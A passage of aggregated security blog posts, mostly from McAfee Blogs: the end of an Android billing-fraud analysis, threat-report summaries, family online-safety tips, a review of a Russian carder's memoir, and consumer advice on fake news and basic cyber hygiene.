Finally, apps from the Google Play campaigns use the domain vilandsoft[.]com to check for updates. The same domain is also used by apps from the fake-installer campaign to deliver remote-execution commands, for example, action_sendsms:

Figure 18. A fake-installer app checking for the command action_sendsms.

The following timeline identifies the campaigns we have found from this group, strategies to trick users into installing the apps, distribution methods, main payload, and targeted countries:

 

Figure 19. A timeline of Sonvpay campaigns.

Conclusion

Sonvpay campaigns are one example of how cybercriminals like the AsiaHitGroup Gang constantly adapt their tactics to trick users into subscribing to premium-rate services and boosting their profits. The campaigns started in late 2016 with very simple fake installers that charged users for copies of popular apps. In late 2017, Google Play apps abused WAP-billing services and used IP address geolocation to target specific countries. In 2018, Google Play apps used silent background push notifications to trigger the display of a fake update message and to gather data for mobile billing fraud. We expect that cybercriminals will continue to develop and distribute new billing fraud campaigns to target more countries and affect more users around the world.

Cybercriminals always follow the money, and one of the most effective ways to steal money from users is via billing fraud. A victim will likely not notice a fraudulent charge, for example, until it appears on the mobile bill at the end of the month. Even when the payment is detected early, most of the time the charge is for a subscription rather than a one-time payment. Thus victims will need to find a way to unsubscribe from the premium-rate service, which may not be easy if the subscription occurred silently or if the app does not provide that information. Also, the fact that WAP-billing fraud does not require sending an SMS message to a premium-rate number makes it easier to commit. Cybercriminals need to only silently subscribe users by forcing them to load the WAP-billing service page and click on buttons. For these reasons we expect that mobile billing fraud will continue to target Android users.

McAfee Mobile Security detects this threat as Android/Sonvpay. To protect yourselves from this and similar threats, employ security software on your mobile devices, check user reviews for apps on Google Play, and do not accept or trust apps that ask for payment functionality via SMS messages as soon as the app is opened or without any interaction.

The post AsiaHitGroup Gang Again Sneaks Billing-Fraud Apps Onto Google Play appeared first on McAfee Blogs.

‘McAfee Labs Threats Report’ Spotlights Innovative Attack Techniques, Cryptocurrency Mining, Multisector Attacks

In the McAfee Labs Threats Report June 2018, published today, we share investigative research and threat statistics gathered by the McAfee Advanced Threat Research and McAfee Labs teams in Q1 of this year. We have observed that although overall new malware has declined by 31% since the previous quarter, bad actors are working relentlessly to develop new technologies and tactics that evade many security defenses.

These are the key campaigns we cover in this report.

  • Deeper investigations reveal that the attack targeting organizations involved in the Pyeongchang Winter Olympics in South Korea used not just one PowerShell implant script, but multiple implants, including Gold Dragon, which established persistence to engage in reconnaissance and enable continued data exfiltration.
  • The infamous global cybercrime ring known as Lazarus has resurfaced. We discovered that the group has launched the Bitcoin-stealing phishing campaign “HaoBao,” which targets the financial sector and Bitcoin users.
  • We are also seeing the emergence of a complex, multisector campaign dubbed Operation GhostSecret, which uses many data-gathering implants. We expect to see an escalation of these attacks in the near future.

Here are some additional findings and insights:

  • Ransomware drops: New ransomware attacks took a significant dive (-32%), largely as a result of an 81% drop in Android lockscreen malware.
  • Cryptojacking makes a comeback: Attackers targeting cryptocurrencies may be moving from ransomware to coin miner malware, which hijacks systems to mine for cryptocurrencies and increase their profits. New coin miner malware jumped an astronomical 1,189% in Q1.
  • LNK outpaces PowerShell: Cybercriminals are increasingly using LNK shortcuts to surreptitiously deliver malware. New PowerShell malware dropped 77% in Q1, while attacks leveraging Microsoft Windows LNK shortcut files jumped 24%.
  • Incidents go global: Overall security incidents rose 41% in Q1, with incidents hitting multiple regions showing the biggest increase, at 67%, and the Americas showing the next largest increase, at 40%.

Get all the details by reading the McAfee Labs Threats Report, June 2018.

The post ‘McAfee Labs Threats Report’ Spotlights Innovative Attack Techniques, Cryptocurrency Mining, Multisector Attacks appeared first on McAfee Blogs.

Summer Refresh: Take Time to Relax but Not on Password Security

With summer comes permission to relax a little more, sun a little more, and fun a little more. But, as Newton’s Third Law reminds us, for every action, there is an equal and opposite reaction. Apply that principle to online safety and it might read like this: Each time you relax your family’s digital security a little, there’s a hacker nearby who will step up his or her schemes accordingly.

If your summer routine includes more traveling, online gaming, or time for social connecting, your first line of digital defense is strong, unhackable passwords.

Now is a great time to pump up those passwords to make sure your summer playlist streams seamlessly and summer goes off without a hitch. (Note: If you feel confident in your password strength, type your email address into the site ;– Have I been pwned? to see if your passwords have been compromised).

5 Tips to Pump Up Your Password Strength

  1. Think strength. It’s never too late to put serious thought into creating strong passwords. Begin today. Visualize your password as a superhero. Because of their strength, superheroes like Hulk, Thor, or Optimus Prime can handily protect the world. Strip them of their strength, and each warrior becomes an average Joe vulnerable to the elements of evil. Strength is inherent to password power. Infuse your password with superhero strength by including numbers, lowercase and uppercase letters, and symbols. The more complex your password is, the more difficult it will be for a crook to crack (it’s okay to add a personal touch to your password). A few examples of a secure password might be: myDogisCr@yCr@y!!, Ilov3Gummi3B3ars!! or $oundOfMu$ic_1965.
  2. Get a password manager. If you are driving yourself crazy trying to wrangle a million passwords, a password manager will do the remembering for you. A powerful password manager will:  Generate random passwords that are difficult to guess, require Multi-Factor Authentication (MFA), auto-save and securely enter your passwords on frequented sites.
  3. Use unique passwords and MFA. If taken seriously, these two extra steps could save you a million headaches. 1) Use unique passwords for each of your accounts. By using different passwords, you avoid having all of your accounts become vulnerable if you are hacked (think domino effect). 2) MFA is Multi-Factor Authentication (also called two-step verification or authentication ). MFA confirms a user’s identityonly after presenting two or more pieces of evidence. Though not 100% secure, this practice adds a layer of security to an account.
  4. Pay attention and take action. It might be summer, but if you snooze, you will lose — privacy in this case. Be sure to pay attention to the news and know if a data breach affects your family. According to the Identity Theft Resource Center® (ITRC), the number of U.S. data breach incidents in2017 hit a new record high, rising a drastic 44.7 percent over 2016. Popular sites such as Facebook, Netflix, and Twitter have experienced breaches might easily have affected you or a member of your family.
  5. Connect carefully. So you’ve done everything you can to create strong passwords and that’s awesome! What you can’t control is how others protect your account data, which often includes passwords. Make sure that websites, platforms, and companies that have access to your sensitive information take security seriously and have privacy and security plans in place. Google the company before you establish an account to see if it has had a data breach.

What are the potential consequences of a weak password? A determined hacker can track a person’s online activity, identify and hack weak passwords then use those weak passwords to access banking information, credit card numbers, and personal data used to steal a person’s identity. Remember: Just as you go to work each morning to put food on the table for your family, a hacker has similar goals. So, work with equal diligence to protect what’s yours.

toni page birdsong

 

Toni Birdsong is a Family Safety Evangelist to McAfee. You can find her on Twitter @McAfee_Family. (Disclosures).

The post Summer Refresh: Take Time to Relax but Not on Password Security appeared first on McAfee Blogs.

Teens, Gaming and Risk

How Are Your Kids Navigating the Dangers?

It’s no secret that our generation of digital natives love their gaming. Whether it’s on their smartphones, laptops or their dedicated gaming consoles – it’s quite mind boggling just how much gaming they can squeeze into their day-to-day lives!

Well, new research by McAfee shows exactly how much time our Aussie kids are spending working on their latest gaming quest – up to a whopping 4 hours a day! And while we would love them to be directing this time to homework, my bigger concern is around the risks.

Gaming Is Not All Bad News

When managed properly, gaming can be a terrific activity that provides some genuine benefits for players. Research shows it can help manage anxiety and depression, reduce pain and even help improve the memory and resilience of players. It can also provide terrific opportunities for social interactions by breaking down the barriers of physical social groups. Sounds idyllic, doesn’t it!!

Parents Concerned About Risks With Gaming

Despite our offspring assuring us otherwise, the majority of us parents do realise that there are some potential dangers associated with gaming. Two-thirds of us (65%) believe our kids are at risk of online grooming. 68% of us are concerned about cyberbullying and 58% worry that our children will become the victim of a cybercriminal’s scam.

What Are Parents Doing To Manage Risks of Online Gaming?

As first generation digital parents, we have a tough gig. Many of us are furiously trying to get our own heads around the constantly changing digital world without any intel from previous generations. Meanwhile, we need to be educating our kids about the challenges and pitfalls of the online world. It’s a big task!

Many parents do an amazing job but unfortunately, not all of us are taking the necessary steps to protect our kids and teach them how to navigate the challenges. According to the research:

  • almost 1 in 5 parents (18%) never monitor what their children are doing online;
  • 32% of parents do not follow the age ratings of games; and
  • 86% of parents allow their children to play online games recommended for older children.

This is despite the fact that many of us worry that our children will be exposed to violence, sex, drugs and gambling according to the research.

How Can We Protect Our Kids While Playing Video Games

It’s clearly one of the most popular hobbies for Aussie tweens and teens, so our job as parents is to ensure our kids are gaming as safely as possible. Here is my advice on the steps you should take to protect your kids:

  • Start Conversations Early

If you start talking about ways to game safely early, it will make your job that much easier when your children get older. If your kids are young, start with simple rules like: “don’t open messages from people you don’t know” and “decline friend requests from strangers.” You want online safety to be part of normal behaviour.

  • Be Careful What You Click

Most children have been using digital activities for entertainment from an early age, desensitising them to the potentials risks of online behaviour. Cybercriminals can use the popularity of video games to entice gamers to click on potentially malicious links. Think about what you are clicking on and ensure that it’s from a reliable source.

  • Control How Long They Play

Set a good example by minimising your use of devices around the home. Why not invest in parental control software to set time limits on your child’s device usage? Not only will you be reducing their exposure to potentially malicious or inappropriate websites, but they will probably get more homework done!

  • Avoid Malicious Links

If your children are searching online for gaming tips or new games to download, a tool like McAfee WebAdvisor can help them avoid dangerous websites and links, and will warn them if they do accidentally click on something malicious.

  • Be Protected

No matter what anyone in the family is doing online, invest in a security product like McAfee Total Protection that can help keep connected devices safe from malware. Just like any PC application, be sure to keep security software updated.

Responsible Gaming Could Actually Prepare Your Child for Their Career

In my opinion, parenting is all about preparing your child for their adult life. And a big part of that is ensuring they are employable. So, before you crack down too harshly on your child’s gaming habits consider this. A recent report by McAfee, entitled Winning The Game, identified that gamers have a skills set that may help fill the current and future demand for cyber security experts. Whether it’s cracking systems, avoiding counter attacks or deciphering codes, these gaming skills were nominated by almost 1000 cyber security professionals as easily transferable to a security professional role.

So, let your kids keep playing but absolutely minimise the risks. Introduce time limits, ensure a game is suitable and teach your kids how to navigate the challenges. That way, if they end up with an illustrious career in cybersecurity, you can take all the credit!!

Take care,

Alex xx

The post Teens, Gaming and Risk appeared first on McAfee Blogs.

Vacation Checklist: 5 Easy Ways to Help Secure Your Family’s Devices When Traveling

With this writing, we’re joyfully en route to a much-anticipated Florida vacation. A sneak peek into our car — and the thousands of other cars headed south on Interstate 4 — offers a reflection of family life today. Mom has her earbuds on and is listening to her newest audiobook, Dad is nodding along with his favorite podcaster over the car stereo, and the teenager in the back seat is making faces into her phone for her Snapchat pals.

Can we get through this vacation without our faces planted in our phones? Can we find ways to unplug more and plug into the moment? That’s certainly our plan. However, each one of us will have to rely on his or her tech from time to time. Frankly, who doesn’t these days?

Our Tech Reality

It’s nearly impossible to vacation minus our electronics, but we’ve agreed to unplug for several reasons. The first reason, of course, is the goal of being present and enjoying our time together. The second reason we want to limit our tech use while traveling is safety. Nothing has the power to obliterate a family vacation faster than stolen data, credit card info, or devices.

5 tips for a more secure family vacation

  1. Keep devices protected and close. Device theft season is upon us. And, distracted vacationers are the perfect target. So, make sure your smartphone is password protected, security settings are tuned up, and screen lock is on. Keep your phones, tablets, laptops, and handheld gaming devices on your person or locked in a hotel safe when you are away. And, leave at home any electronic equipment you don’t need during your trip.
  2. Turn on Find My Phone. This is a bigger deal than you might guess. No one plans on losing a phone, but hey, it happens. Have the “don’t lose your phone” conversation with your kids several times but back that up by having everyone in the family turn on his or her lost phone app just in case. Consider an extra layer of protection on mobile devices with mobile security software.
  3. Be cautious when using public Wi-Fi. If you need to send an email, photos, or preserve your family’s data plan by jumping on the hotel’s public Wi-Fi while on vacation, make sure that Wi-Fi is secure and attached to a trusted source. Ask for the establishment’s Wi-Fi and log on to that exact name. Hackers can easily create fake hotspots (called faux towers) with similar names. Also, if you aren’t actively using a hotspot, turn off your Wi-Fi setting as well as “auto-join” setting so that your device is not visible to others. Consider shutting off your Bluetooth setting as well. To be extra sure of security, two tips from the Federal Communications Commission: While using a public Wi-Fi network, periodically adjust your phone settings to forget the network, then log back in again. And, if you want to asses the network’s security, try purposely logging onto the public Wi-Fi using the wrong password. If you can get on anyway, that’s a sign that the network is not secure. The best way to stay safe while traveling may be a Virtual Private Network or VPN. According to one McAfee study, when it comes to Wi-Fi security specifically, 58% of survey respondents know how to check if a Wi-Fi network is secure and safe to use, but less than half (49%) take the time to ensure their connection is secured. Be aware and don’t be in that latter percent.
  4. Keep software updated. Before you travel, check for any software updates on your devices. Updates often fix security bugs and seal up cracks in the system. Add another layer of protection by safeguarding your devices with security software.
  5. Avoid accessing financial data. It’s a good idea to get your banking in order before you leave for vacation. Trying to move funds from one account to another or even check your balance can open you up to hackers if you have to do so on a public network.One of the most significant ways you can secure your family vacation is adopting a mindset of awareness. We get excited while on vacation. We want to send those pictures, transfer that money, or get that email out of the way. Very few of us — especially our kids — are concerned about cyber crooks and thieves trying to ransack our well-laid vacation plans. With a few extra minutes invested into your travel plans, you can thoroughly enjoy your family time.

toni page birdsong

 

Toni Birdsong is a Family Safety Evangelist to McAfee. You can find her on Twitter @McAfee_Family. (Disclosures).

The post Vacation Checklist: 5 Easy Ways to Help Secure Your Family’s Devices When Traveling appeared first on McAfee Blogs.

Threat Report: Don’t Join Blockchain Revolution Without Ensuring Security

On May 19 researchers discovered a series of vulnerabilities in the blockchain-based EOS platform that can lead to remote control over participating nodes. Just four days prior, a mining pool server for the IOT platform HDAC was compromised, impacting the vast majority of miners. In January the largest-ever theft of cryptocurrencies occurred against the exchange Coincheck, resulting in the loss of US$532 million in NEM coin. Due to its increased popularity and profitability cybercriminals have been targeting all things blockchain. McAfee Advanced Threat Research team analysts have now published the McAfee Blockchain Threat Report to explain current threats against the users and implementers of blockchain technologies.

What is Blockchain?

Even if you have not heard of blockchain, you have likely heard of cryptocurrencies, namely Bitcoin, the most popular implementation. In late 2017 Bitcoin reached a value of $20,000 per coin, prompting a lot of interest in the currency—including from cybercriminals. Cryptocurrencies are built on top of blockchain, which records transactions in a decentralized way and enables a trusted “ledger” between trustless participants. Each block in the ledger is linked to the next block, creating a chain. Hence, the system is called a blockchain. The chain enables anyone to validate all transactions without going to an outside source. From this, decentralized currencies such as Bitcoin are possible.

Proof-of-work blockchain. Source: https://bitcoin.org/bitcoin.pdf.

Blockchain Attacks

Attackers have adopted many methods targeting consumers and businesses. The primary attack vectors include phishing, malware, implementation vulnerabilities, and technology. In a phishing scheme in January, Iota cryptocurrency lost $4 million to scams that lasted several months. Malware authors often change their focus. In late 2017 to early 2018 some have migrated from deploying ransomware to cryptomining. They have been found using open-source code such as XMRig for system-based mining and the mining service Coinhive.

Source: McAfee Labs

Implementation vulnerabilities are the flaws introduced when new technologies and tools are built on top of blockchain. The recent EOS attack is one example. In mid-July 2017 Iota suffered an attack that essentially enabled attackers to steal from any wallet. Another currency, Verge, was found with numerous vulnerabilities. Attackers exploiting the vulnerabilities were able to generate coins without spending any mining power.

Known attacks against the core blockchain technology are much more difficult to implement, although they are not unheard of. The most widely known attack is the 51% attack, or majority attack, which enables attackers to create their own chains at will. The group 51 Crew targeted small coins, including Krypton, and held them for ransom. Another attack, known as a Sybil attack, can allow an attacker to completely control a targeted victim’s ledger. Attempts have been made for larger scale Sybil attacks such as one in 2016. 

Dictionary Attacks

Blockchain may be a relatively new technology but that does not mean that old attacks cannot work. Mostly due to insecure user behavior, dictionary attacks can leverage some implementations of blockchain. Brain wallets, or wallets based on weak passwords, are insecure, yet people still use them. These wallets are routinely stolen, as was the case with the nearly BTC60 stolen from the following wallet:

This wallet recorded two transactions as recently as March 5, 2018. One incoming and one outgoing transaction occurred within roughly 15 minutes. Source: https://blockchain.info.

Exchanges Under Attack

The biggest players, and targets, in blockchain are cryptocurrency exchanges. Cryptocurrency exchanges can be thought of as banks in which you users create accounts, manage finances, and even trade currencies including traditional ones. One of the most notable incidents is the attack against Mt. Gox between 2011‒2014 that resulted in $450 million of Bitcoin stolen and led to the liquidation and closure of the company. Coincheck, previously mentioned, survived the attack and began reimbursing victims for their losses in March 2018. Not all recent exchanges fared so well. Bitcurex abruptly closed and led to an official investigation into the circumstances; Youbit suffered two attacks, leading the company into bankruptcy.

An advertisement for the shuttered Polish exchange Bitcurex.

Conclusion 

Blockchain technologies and its users are heavily targeted by profit-driven cybercriminals. Current attackers are changing their tactics and new groups are entering the space. As more businesses look to blockchain to solve their business problems and consumers increasingly rely on these technologies, we must be diligent in understanding where the threats lie to achieve proper and tailored risk management. New implementations must place security at the forefront. Cybercriminals have already enjoyed successes against the users and implementations of blockchain so we must prepare accordingly.

The post Threat Report: Don’t Join Blockchain Revolution Without Ensuring Security appeared first on McAfee Blogs.

#CyberAware: 4 Actionable Steps to Boost Your Family’s Safety Online

Summer has officially rolled out its welcome mat. But as most parents might be thinking about slowing down, for most kids, summer is when digital device use goes into overdrive. That’s why June — which also happens to be Internet Safety Month — is a perfect time strengthen your family’s digital readiness.

Good news: This digital safety skills booster is quick and actionable. And who knows — if a few of these tips boost your family’s safety, you may have just saved summer for everyone!

4 Ways to Boost Family Safety Online 

Practice safe social. Challenge your family to reign in its social footprint by taking these specific actions: 1) Adjust privacy settings on all social networks. 2) Trim friend and follower lists. 3) Delete any personal data on social profiles such as birthdate, address, or school affiliation. 4) Edit, limit app permissions. As we’ve just seen in the headlines, the misuse of personal data is a very big deal. 5) Share with care. Routinely scrolling, liking, and commenting on social sites such as Snapchat and Instagram can give kids a false sense of security (and power). Remind tweens and teens to share responsibly. Oversharing can damage a reputation and words or images shared callously can damage other people.

Practice safe gaming. Summertime is a gamer’s heaven. Endless battles and showdowns await the dedicated. However, some digital pitfalls can quickly douse the fun. According to the National Cyber Security Alliance’s gaming tip sheet, safe gaming includes: updating gaming software, protecting devices from malware, protecting your child’s personal data, using voice chat safely, and paying close attention to content ratings.

Practice strong security. There are some steps only a parent can take to safeguard the family online. 1) Parental controls. Filtering software blocks inappropriate websites and apps as well as establishes boundaries for family tech use. 2) Comprehensive security software helps protect your PCs, tablets, and devices from viruses, malware, and identity theft. 3) Keeping your guard up. According to McAfee’s Gary Davis staying safe online also includes digital habits such as using strong passwords, boosting your network security and firewall, and being aware of the latest scams that target consumers.

Practice wise parenting. 1) Know where kids go. Know which apps your kids love and why, how they interact with others online, and how much time they spend online. 2) Unplug. Establish tech-free family activities this summer. Powering off and plugging into quality time is the most powerful way to keep your family safe online. Strong relationship empowers responsibility. 3) Be confident. As parenting expert, Dr. Meg Meeker says, parents should be parenting from a place of confidence, rather than from a place of fear. “The temptation for parents is to think that they have no control over what their child does online. This isn’t true,” says Meeker. “Parents, you are in control of your child’s technology use; it is not in control of you.”

toni page birdsong

 

Toni Birdsong is a Family Safety Evangelist to McAfee. You can find her on Twitter @McAfee_Family. (Disclosures).

The post #CyberAware: 4 Actionable Steps to Boost Your Family’s Safety Online appeared first on McAfee Blogs.

High-Tech & Hackable: How to Safeguard Your Smart Baby Devices

It’s just about as creepy as it gets: A hacker breaking into a smart device in your baby’s nursery. The Internet of Things (IoT) has wrapped our homes technology, which means any piece of technology you own — be it a smartphone, a thermostat, or even a baby toy or monitor — is fair game for hackers.

High tech products geared toward parents of newborns and kids are on the rise. Reports show that new parents are fueling this industry and purchasing everything from smart diapers, onesies, baby monitors, digital bassinets, soothers, high-tech swings, breathing monitors, play pads, and a string of smart toys. Parents purchasing baby tech and digital toys are counting on fresh tech ideas and products to increase efficiency and maintain a constant connection to their kids.

But these seemingly efficient products, some argue, could be increasing parent’s stress in some cases. Are these tech products, which are also highly hackable, worth the risk and worry?

The Pros

Peace of mind, safety. Smart baby devices give anxious parents added peace of mind when it comes to worries. Who doesn’t want to see their sweet baby deep in sleep and go to bed without worry? Given a chance, many parents welcome the opportunity to know their baby’s temperature, oxygen levels, heartbeat, and breathing are on track.

Remote monitoring, convenience. When you can be downstairs or working in the yard, or in your home gym, and still check on a sleeping baby, that’s an incredible convenience that many parents welcome as a productivity booster.

Learning and development. Many parents purchase smart devices for kids in an effort to help them stay on track developmentally and ensure they are prepared for the tech-driven world they are heading into.

The Cons

Hackable. Any device that is web-enabled or can connect to the cloud has the potential to be hacked, which can create a whole new set of issues for a family. If you are getting sleeping, breathing, and health data on your child, anyone else could be getting that same information.

False readings. Baby technology, as useful as it appears, can also have glitches that medical professionals argue can be more harmful than helpful. Can you imagine waking up at 2 a.m. to a monitor alarm that falsely says your baby isn’t breathing?

Complex, pricey. Some of the products can be complicated to program and set up and pricey to purchase or replace.

So why would a hacker even want to break into a baby monitor, you may ask? For some hackers, the motive is simply because they can. Being able to intercept data, crash a device, or prove his or her digital know-how is part of a hacker’s reward system. For others, the motives for stalking your family’s activities or talking to kids in the middle of the night can prove to be a far more nefarious activity.

Tips to safeguard baby tech:

Think before you purchase. According to the tech pros, think before buying baby tech and evaluate each item’s usefulness. Ask yourself: Do I need this piece of technology? Will this product potentially decrease or increase my stress? If a product connects to the wi-fi or the cloud, weight its convenience against any risk to your family’s data.

Change default passwords. Many products come with easy-to-guess default passwords that many consumers don’t take the time to change. This habit makes it easy for hackers to break in. Hackers can also gain access to entire wifi networks just by retrieving the password stored on one device. (Sometimes all a hacker does is google a specific brand to find the product’s password — yes, it’s as easy as that!)

Buy from known brands. Buy from reputable manufacturers and vendors. Google to see if that company’s products have ever been digitally compromised. And although it’s tempting to get your device used to save a little money, second-hand technology might have malware installed on it so beware.

Update software, use strong passwords. If there’s a software update alert connected to your baby tech, take the time to update immediately and be sure to choosing a password with a minimum of 16 characters and not using the same password for more than one device.

Turn off. When your devices are not on, there’s no vulnerability so, even with all the safeguards, remember to turn off devices not in use for that last layer of protection.

toni page birdsong

 

 

Toni Birdsong is a Family Safety Evangelist to McAfee. You can find her on Twitter @McAfee_Family. (Disclosures).

The post High-Tech & Hackable: How to Safeguard Your Smart Baby Devices appeared first on McAfee Blogs.

How to Steal a Million: The Memoirs of a Russian Hacker

As a University researcher specializing in cybercrime, I've had the opportunity to watch the Russian carding market closely and write about it frequently on my blog "Cybercrime & Doing Time."  Sometimes this leads to interactions with the various criminals that I have written about, which was the case with Sergey.  I was surprised last January to be contacted and to learn that he had completed a ten year prison sentence and had written a book.   I have to say, I wasn't expecting much.  This was actually the third time a cybercriminal had tried to get my interest in a book they had written, and the first two were both horrible and self-promotional.  I agreed to read his first English draft, which he sent me in January 2017.

I was absolutely hooked from page 1.  As I have told dozens of friends since then, his story-telling vehicle is quite good.  The book starts with him already in prison, and in order to teach the reader about carding and cybercrime, a lawyer visits him periodically in prison, providing the perfect foil  needed to explain key concepts to the uninitiated, such as interrupting one of Sergey's stories to ask "Wait.  What is a white card?"
My copy of the book!

As someone who has studied cybercrime for more than 20 years, I was probably more excited than the average reader will be to see so many names and criminal forums and card shops that I recognized -- CarderPlanet, and card shop runners such as Vladislav Khorokhorin AKA BadB, Roman Vega AKA Boa, and data breach and hacking specialists like Albert Gonzalez and Vladimir Drinkman who served as the source of the cards that they were all selling.  These and many of the other characters in this book appeared regularly in this blog.  (A list is at the bottom of this article)

Whether these names are familiar to the reader or not, one can't help but be drawn into this story of intrigue, friendship, and deception as Pavlovich and his friends detect and respond to the various security techniques that shopkeepers, card issuers, and the law enforcement world are using to try to stop them.  Sergey shows how a criminal can rise quickly in the Russian cybercrime world by the face-to-face networking that a $100,000 per month income can provide, jet-setting the world with his fellow criminals and using business air travel, penthouse hotel suites, cocaine and women to loosen the lips of his peers so he can learn their secrets., but he also shows how quickly these business relationships can shatter in the face of law enforcement pressure.

The alternating chapters of the book serve as a stark reminder of where such life choices lead, as Sergey reveals the harsh realities of life in a Russian prison.  Even these are fascinating, as the smooth-talking criminal does his best to learn the social structure of Russian prison and find a safe place for himself on the inside.  The bone-crushing beatings, deprivation of food and privacy, and the fear of never knowing which inmate or prison guard will snap next in a way that could seriously harm or kill him is a constant reminder that eventually everyone gets caught and when they do, the consequences are extreme.

Sergey's original English manuscript has been greatly improved with the help of feedback from pre-readers and some great editors. After my original read, I told Sergey "I LOVE the story delivery mechanism, and there are fascinating stories here, but there are a few areas that really need some work."  It's clear that he took feedback like this seriously.  The new book, released in May 2018, is markedly improved without taking anything away from the brilliant story-telling of a fascinating criminal career ending with a harsh encounter with criminal justice.

A purchase link to get the book from Amazon: How to Steal a Million: The Memoirs of a Russian Hacker

The book was extremely revealing to me, helping me to understand just how closely linked the various Russian criminals are to each other, as well as revealing that some brilliant minds, trained in Computer Science and Engineering, and left morally adrift in a land where corruption is a way of life and with little chance of gainful employment, will apply those brilliant minds to stealing our money.

I seriously debated whether I should support this book.  Many so-called "reformed" criminals have reached out to me in the past, asking me to help them with a new career by meeting with them, recommending their services, or helping them find a job.  It is a moral dilemma.  Do I lend assistance to a many who stole millions of dollars from thousands of Americans?  Read the book.  To me, the value of this book is that it is the story of a criminal at the top of his game, betrayed by his colleagues and getting to face the reality of ten years in a Russian prison.  I think the book has value as a warning -- "a few months or even a couple years of the high life is not worth the price you will pay when it all comes crashing down."

Links to selected blog articles that feature Pavlovich's cast of characters:

May 12, 2008 TJX and Dave and Busters - Maksym Yastremskiy (Maksik) Aleksandr Suvorov (JonnyHell) and Albert Gonzales (Segvec) and their role in the TJX Data Breach.

August 5, 2008 TJX Reminder: We Will Arrest You and We Will Send You To Jail - some of the legal aftermath of the case above.

August 8, 2008 TJX: the San Diego Indictments where the US government indicts:
  • SERGEY ALEXANDROVICH PAVLOVICH, aka Panther, aka Diplomaticos, aka PoL1Ce Dog, aka Fallen Angel, aka Panther757
  • DZMITRY VALERYEVICH BURAK, aka Leon, aka Graph, aka Wolf
  • SERGEY VALERYEVICH STORCHAK, aka Fidel
and charges them with violation of "18 USC Section 1029(b)(2) Conspiracy to Traffic Unauthorized Access Devices"

May 9, 2013 ATM Cashers in 26 Countries Steal $40M talks about BadB's role in "Unlimited" ATM cash-out schemes, and his arrest in 2010 and sentencing to 88 months in 2013.

Jan 14, 2014 Target Breach Considered in Light of Drinkman/Gonzalez Data Breach Gang talked about Albert Gonzales, Vladimir Drinkman, and how there seemed to be such a strong pattern of behavior - a script if you will - to how criminals were conducting the major data breaches of that time.

Jan 27, 2014 Roman Vega (CarderPlanet's BOA) Finally Gets His Sentence addressed the plight of Roman Vega, who had been drifting around in the American criminal justice system, unsentenced, from 2003 until 2013! Dmitry Golubov AKA Script, the "godfather of CarderPlanet" is also discussed in this post.



STOP FAKE NEWS – PAUSE, EVALUATE and FORWARD


The potential for fake news to turn viral using social media is quite real. There have been several instances where rumors have incited mob violence between rival communities. The consequence got out of hand when illiterate tribals in a remote Indian district received a Whatsapp message which claimed that children could be kidnapped by a gang and their body parts sold. The message went viral in these villages and mobs of upto 500 people pounced on strangers who they suspected to the child kidnappers, in all there were two incidents where 7 people were lynched.
It is quite apparent to every cybercitizen that fake or distorted news is on the rise. Social media allows every individual a platform to disseminate such news or information. Fake news is routinely posted for vested interest such as political distortion, defamation, mischief, inciting trouble and to settle personal problems.

 As aptly illustrated in the case above, when fake news goes viral the ill effects escalate to a point where they can cause physical damage, loss of life or long-term animosity between sections of society. Purposely-crafted fake/distorted news introduced over periods of time by vested interests can distort perspectives and social harmony. Such news is effectively used for ideological indoctrination.

Creation of fake news is extremely simple. Listed below are six commonly used methods

·         Individuals concoct their own stories

·         Marketers release competitive advertisements based on unproven data

·         Groups with vested interests manipulate the volume and narrative of news.

·         Photographs are morphed

·         Old photographs are used to depict recent events

·         Real photographs are used to defame

Obviously, it is also quite easy to catch the perpetrator. A few years back, a twitter hoax was dealt with by a strong reprimand, but not today. Fake news, hoaxes, rumours or any other type of content that results in incitement or defamation attract stronger penalties and jail terms. Police are more aware and vigilant.
Most cybercitizens unwitting help fake news go viral by recirculating it. It creates a sense of belief that it must be true because the other person must have validated the news before sending it.

Pause before forwarding, Evaluate veracity and then Forward. Do not be that link in the chain responsible for the circulation of Fake News
Cybercitizens, do take care when crafting messages on social media – a little mischief may provide you a few years in government paid accommodation – Jail. Advise your children to be responsible and do cross check news received over social media before recirculating or believing in it.

Twelve Commandments that will never fail to Keep You Cyber Safe Online

As the digital world explodes with a variety of new online services, cyber threats have become more ingenuous, dangerous, and spawned multiple variants and types. As each new threat makes the headline, the accompanying set of threat specific security recommendations confuses cybercitizens. Cybercitizens want a comprehensive list of recommendations that do not change frequently.

There are twelve foundational security practices that will help keep you and your family safe. Practicing them will harden your defenses against cybercrime and also reduce the negative effects of social media use.

1)    Thou shalt not use a device with pirated software
Pirated software is not patched as it is unlicensed. Unpatched software have security vulnerabilities which can be easily exploited to steal data and credentials

2)    Thou shalt not use a device which is not set for automatic updates of Operating System patches
Automatic patching for personal devices is the best way to ensure that the latest security patches are applied and security loopholes closed before cybercriminals can get to them

3)    Thou shalt not use a device without updated antimalware (antivirus) software installed
Antimalware software reduces the probability of a malware infection (e.g. ransomware) on your device. For it to be effective to catch the latest malware variants, it has to be automatically updated with the latest updates.

4)    Thou shall not download pirated movies, games and other such material
Something free may turn out to be expensive, both financially and to your reputation. Malware is usually bundled with pirated content or applications

5)    Thou shall not use a site without trying to verify its authenticity
Authenticity of a site can be verified by the Lock Icon and accompanying digital certificate. While not fool proof, it reduces the possibility of spoofed lookalike sites designed to steal your credentials

6)    Thou shall not ignore inappropriate content on social networks, always report or dislike it
Inappropriate content influences the minds of our children as they stumble upon it online. Hate content in particular may induce biases which take a long time to reverse.

7)    Thou shalt not indulge or encourage cyber bullying online
A parent or teacher has the additional responsibility of guiding children on the right online behavior. You do not want your children to bully or be bullied

8)    Thou shalt not use passwords that can be easily guessed and promise to  keep the password a secret
Try to choose complex passwords, do not reuse them on multiple sites and always store them securely. The easiest way to get into your online accounts is by stealing your passwords

9)    Thou shalt not fall be tempted by fraudulent emails promising financial windfalls or miracle cures or cheap medicines
Try to check the authenticity of the email. Electronic communication is easily manipulated, as it is difficult to verify the authenticity of the sender. Scams like these can cost you money and affect your health.

10) Thou shall not forsake your responsibility of helping your older parents or young kids to be safe as they use the internet
Be a guide and easily available as both old and young learn to use the internet and face cyber risks. Being available, requires that you can be reached for instant advice on problems they encounter

11) Thou shalt never trust a stranger blindly online
Always be suspicious when dealing with online strangers. At any point during the relationship never let down your guard. The identity of an online person cannot be easily verified. It can however be easily manipulated. Online friends sometimes have the vilest of intention which can lead to all forms of blackmail, particularly if they have incriminating pictures and videos. Besides adults, young children are potential victims

12) Thou shalt not set a weak password for your mobile phone or keep it unlocked
A stolen phone with an easy to guess password or if unlocked, is a sure invitation into all your signed in accounts and personal data. A large number of phones are left unattended or lost each year.



